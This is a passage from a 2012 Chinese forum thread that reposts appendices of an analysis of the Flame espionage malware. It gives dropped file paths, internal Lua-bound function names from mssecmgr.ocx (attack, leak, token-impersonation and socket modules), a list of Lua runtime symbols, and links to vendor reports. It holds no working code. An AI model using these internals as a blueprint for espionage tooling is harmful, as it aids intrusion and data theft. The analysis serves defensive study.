"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra53.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rf288.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra61.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~a38.tmp" "C:\WINDOWS\system32\soapr32.ocx" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp~mso2a2.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp~mso2a0.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp~mso2a1.tmp" "C:\WINDOWS\system32\nteps32.ocx" "C:\WINDOWS\system32\advnetcfg.ocx" "C:\WINDOWS\system32\boot32drv.sys" "C:\WINDOWS\system32\ccalc32.sys" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV473.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV927.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV084.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV294.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV751.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI988.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI989.tmp"
本帖最后由 wobaxindiule 于 2012-8-2 16:15 编辑
附录六
表5-6为Mssecmgr.ocx文件中的LUA脚本调用函数列表内容
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>316<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::send<|oOo|>1731<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>218<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::removeListElement<|oOo|>615<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>320<|oOo|>"
"<|oOo|>flame::lua::CommandPackage::post<|oOo|>177<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>234<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::connect<|oOo|>1894<|oOo|>"<|oOo|>flame::lua::ConfigurationPackage::getListSize<|oOo|>454<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::exec<|oOo|>1161<|oOo|>"
"<|oOo|>flame::lua::CommandPackage::runCmdSync<|oOo|>213<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsBoolean<|oOo|>188<|oOo|>"
"<|oOo|>flame::lua::CommandPackage::runCmdSync<|oOo|>203<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>233<|oOo|>"
"<|oOo|>flame::dbquery:: DbQueryPackage::parseSingleQuery<|oOo|>210<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>326<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>337<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::hasKey<|oOo|>270<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>340<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::recv<|oOo|>1756<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::get<|oOo|>331<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>229<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>350<|oOo|>"
"<|oOo|>flame::lua::ZlibPackage::compress<|oOo|>2158<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>334<|oOo|>"
"<|oOo|>flame::clan:: DbPackage::pushSQLiteValue<|oOo|>430<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage:: DHCPAddress<|oOo|>1238<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::getListElement<|oOo|>584<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>352<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>231<|oOo|>"
"<|oOo|>flame::dbquery:: DbQueryPackage::executeQueries<|oOo|>192<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::connect<|oOo|>1868<|oOo|>"
"<|oOo|>flame::lua::CommandPackage::runCmdSync<|oOo|>199<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::hostname<|oOo|>1069<|oOo|>"
"<|oOo|>flame::cruise::CruisePackage::getDomainGroupUsers<|oOo|>154<|oOo|>"
"<|oOo|>flame::lua::FileIOPackage::fileSize<|oOo|>900<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>153<|oOo|>"
"<|oOo|>flame::lua:: LogPackage::writeLog<|oOo|>1476<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>156<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>238<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::getMac<|oOo|>1301<|oOo|>"
"<|oOo|>flame::dbquery:: DbQueryPackage::executeQueries<|oOo|>198<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::getIpByHostName<|oOo|>1267<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>154<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::bind<|oOo|>1840<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsString<|oOo|>175<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>227<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>158<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::setListElement<|oOo|>526<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::remove<|oOo|>394<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>224<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::connect<|oOo|>1909<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>356<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::getSubKeys<|oOo|>428<|oOo|>"
"<|oOo|>flame::lua:: LuaState::luaHook<|oOo|>221<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>163<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::pushLuaObjectFromKeyValue<|oOo|>669<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>222<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>346<|oOo|>"
"<|oOo|>flame::lua:: LuaState::luaHook<|oOo|>226<|oOo|>"
"<|oOo|>flame::lua::FileIOPackage::del<|oOo|>802<|oOo|>"
"<|oOo|>flame::lua:: LeakPackage::reportLeakCompletion<|oOo|>2125<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>328<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>322<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>236<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::recv<|oOo|>1818<|oOo|>"
"<|oOo|>flame::cruise::CruisePackage::getUserLocalGroups<|oOo|>252<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>332<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>150<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::set<|oOo|>367<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>235<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::recv<|oOo|>1792<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::defaultGateway<|oOo|>1212<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsBuffer<|oOo|>166<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>219<|oOo|>"
"<|oOo|>flame::impersonator::ImpersonatePackage::getTokenByUser<|oOo|>198<|oOo|>"
"<|oOo|>flame::lua::StoragePackage::getStorageMap<|oOo|>2000<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::send<|oOo|>1686<|oOo|>"
"<|oOo|>flame::lua:: LeakPackage::getLeak<|oOo|>2049<|oOo|>"
"<|oOo|>flame::lua::FileIOPackage::copy<|oOo|>846<|oOo|>""<|oOo|>flame::lua::ZlibPackage::uncompress<|oOo|>2179<|oOo|>"
"<|oOo|>flame::lua::StoragePackage::getStorageMap<|oOo|>1997<|oOo|>"
"<|oOo|>flame::dbquery:: DbQueryPackage::executeQueries<|oOo|>143<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>330<|oOo|>"
"<|oOo|>flame::cruise::CruisePackage::getLocalGroupMembers<|oOo|>108<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>220<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::defaultGateway<|oOo|>1215<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>225<|oOo|>"
"<|oOo|>flame::impersonator::ImpersonatePackage::getCurrentToken<|oOo|>173<|oOo|>"
"<|oOo|>flame::lua:: LeakPackage::getLeak<|oOo|>2062<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>343<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage:: D HCPAddress<|oOo|>1235<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>161<|oOo|>"
"<|oOo|>flame::lua::FileIOPackage::truncate<|oOo|>821<|oOo|>"
"<|oOo|>flame::lua::FileIOPackage::move<|oOo|>876<|oOo|>"
"<|oOo|>flame::cruise::CruisePackage::getLocalGroups<|oOo|>82<|oOo|>"
"<|oOo|>flame::lua::StoragePackage::save<|oOo|>1981<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::getType<|oOo|>300<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>217<|oOo|>"
"<|oOo|>flame::clan::WmiPackage::getNextResult<|oOo|>465<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>318<|oOo|>"
"<|oOo|>flame::impersonator::ImpersonatePackage::getCurrentToken<|oOo|>168<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsStringsMap<|oOo|>153<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>151<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::setFromStack<|oOo|>709<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>152<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::domainName<|oOo|>1193<|oOo|>"
本帖最后由 wobaxindiule 于 2012-8-2 16:16 编辑
附录七
表5-7为Mssecmgr.ocx文件中使用LUA脚本函数列表内容
luaB_cocreateluaB_collectgarbageluaB_coresumeluaB_cowrapluaB_errorluaB_gcinfoluaB_getfenvluaB_getmetatableluaB_ipairsluaB_loadluaB_loadstringluaB_newproxyluaB_nextluaB_pairsluaB_pcallluaB_rawequalluaB_rawgetluaB_rawsetluaB_selectluaB_setfenvluaB_setmetatableluaB_tonumberluaB_tostringluaB_typeluaB_unpackluaB_xpcallluaD_callluaD_reallocCIluaD_throw
luaG_runerrorluaG_typeerrorluaI_openlibluaL_addlstringluaL_addvalueluaL_argerrorluaL_checkanyluaL_checkintegerluaL_checklstringluaL_checknumberluaL_checkoptionluaL_checktypeluaL_checkudataluaL_errorluaL_findtableluaL_getmetafieldluaL_newmetatableluaL_optlstringluaL_prepbufferluaL_pushresultluaL_typerrorluaL_whereluaS_newlstrluaT_gettmbyobjluaV_settablelua_addklua_adjuststacklua_assignmentlua_aux_close
lua_auxopenlua_auxresumelua_base_openlua_bodylua_breakstatlua_concatlua_createmetalua_createstdfilelua_createtablelua_db_errorfblua_db_getinfolua_emptybufferlua_enterlevellua_errorlimitlua_f_flushlua_f_readlua_f_seeklua_f_setvbuflua_f_writelua_fflushlua_fixjumplua_forlistlua_fornumlua_funcargslua_funcinfolua_g_readlua_g_writelua_getcurrenvlua_getfenv
lua_getfieldlua_getfunclua_getinfolua_getobjnamelua_getstacklua_getthreadlua_index2adrlua_indexupvaluelua_insertlua_io_closelua_io_fcloselua_io_gclua_io_openlua_io_pcloselua_io_readlinelua_io_tostringlua_io_typelua_ipairsauxlua_isnumberlua_load_auxlua_luaK_checkstacklua_luaK_codelua_luaopen_baselua_luaopen_debuglua_luaopen_iolua_luaopen_mathlua_luaopen_oslua_luaopen_stringlua_luaopen_table
lua_new_localvarlua_newfilelua_newuserdatalua_paniclua_parlistlua_prefixexplua_pushcclosurelua_pushclosurelua_pushfstringlua_pushlstringlua_pushresultlua_pushvaluelua_recfieldlua_registerlocalvarlua_removelua_setfieldlua_setmetatablelua_settabsilua_settabsslua_settoplua_simpleexplua_tag_errorlua_tofilelua_tointegerlua_tonumberlua_treatstackoptionlua_typelua_typenamelua_yield
参考文献
http://www.wired.com/threatlevel/2011/07/how-digital-detectives-deciphered-stuxnet/all/http://www.symantec.com/connect/blogs/flamer-highly-sophisticated-and-discreet-threat-targets-middle-east http://blogs.mcafee.com/uncategorized/skywiper-fanning-the-flames-of-cyber-warfare http://www.securelist.com/en/blog/208193538/Flame_Bunny_Frog_Munch_and_BeetleJuiceMicrosoft TechNet:http://technet.microsoft.com/en-us/library/cc963218.aspxhttp://blog.crysys.hu/2012/06/analysis-of-flame-wusetupv-exe-url-parameters/
页:
1
[2]